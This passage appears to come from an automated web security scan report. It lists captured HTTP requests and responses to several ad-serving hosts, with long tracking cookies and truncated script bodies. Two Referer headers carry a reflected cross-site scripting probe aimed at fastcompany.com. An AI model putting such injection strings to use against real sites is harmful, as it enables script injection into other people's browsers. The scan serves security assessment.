Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0201.rm.sp2
Set-Cookie: ih="b!!!!#!3e]N!!!!#=4X%/"; path=/; expires=Wed, 11-Sep-2013 12:48:37 GMT
Set-Cookie: vuday1=Ve/>3!4j#()xxac; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Set-Cookie: uid=uid=88b682c8-dd3d-11e0-8111-78e7d162bf12&_hmacv=1&_salt=2987826240&_keyid=k1&_hmac=d6fc6e23e1a639a39e50969336a0089f0e9aba40; path=/; expires=Wed, 12-Oct-2011 12:48:37 GMT
Set-Cookie: liday1=:Op`R$4^M4!4j#(@7q_<; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:37 GMT
Pragma: no-cache
Content-Length: 712
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10293202
...[SNIP]...
16.3. http://ad.yieldmanager.com/rw  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /rw

Request

GET /rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Content-Length: 782
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" framebord
...[SNIP]...
16.4. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
16.5. http://amch.questionmarket.com/adsc/d907755/101/908678/adscout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d907755/101/908678/adscout.php

Request

GET /adsc/d907755/101/908678/adscout.php?ord=4246944 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:06:12 GMT
Server: Apache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 1
Content-Type: text/html

;
16.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2685991&PluID=0&w=336&h=150&ord=1837674&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/p%3B241151714%3B0-0%3B0%3B42089989%3B18754-336/150%3B42232212/42249999/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 12 Sep 2011 12:48:05 GMT
Connection: close
Content-Length: 2070

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
16.7. http://c14.zedo.com/OzoDB/cutils/R53_7_7/jsc/1545/zpu.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c14.zedo.com
Path:   /OzoDB/cutils/R53_7_7/jsc/1545/zpu.html

Request

GET /OzoDB/cutils/R53_7_7/jsc/1545/zpu.html?n=1545;f=1;z=2-110 HTTP/1.1
Host: c14.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0; PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/html
Date: Mon, 12 Sep 2011 12:48:57 GMT
Edge-Control: dca=esi
Expires: Wed, 12 Oct 2011 12:48:57 GMT
Last-Modified: Fri, 09 Sep 2011 07:01:44 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Server: ECS (sjo/5238)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1340

<html>
<body>
<SCRIPT LANGUAGE="JavaScript">
var zcc7=new Array();var zcd9=0;
function zCF5(zcw1){
if(zcd9<1){
var zct3=''+window.location.search;var zcv4=new Array();var zcd3=zct3.indexOf(';l=')+1;
i
...[SNIP]...
16.8. http://d3.zedo.com/jsc/d3/ff2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /jsc/d3/ff2.html

Request

GET /jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545 HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://c14.zedo.com/OzoDB/cutils/R53_7_7/jsc/1545/zpu.html?n=1545;f=1;z=2-110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24; FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0:0:0; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=0

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 12 Aug 2011 12:13:46 GMT
ETag: "3a9d70f-a35-4aa4dd85cb280"
Vary: Accept-Encoding
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 2613
Cache-Control: max-age=93628
Expires: Tue, 13 Sep 2011 14:49:41 GMT
Date: Mon, 12 Sep 2011 12:49:13 GMT
Connection: close

<!-- Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. -->
<html>
<head>
<script language="JavaScript">
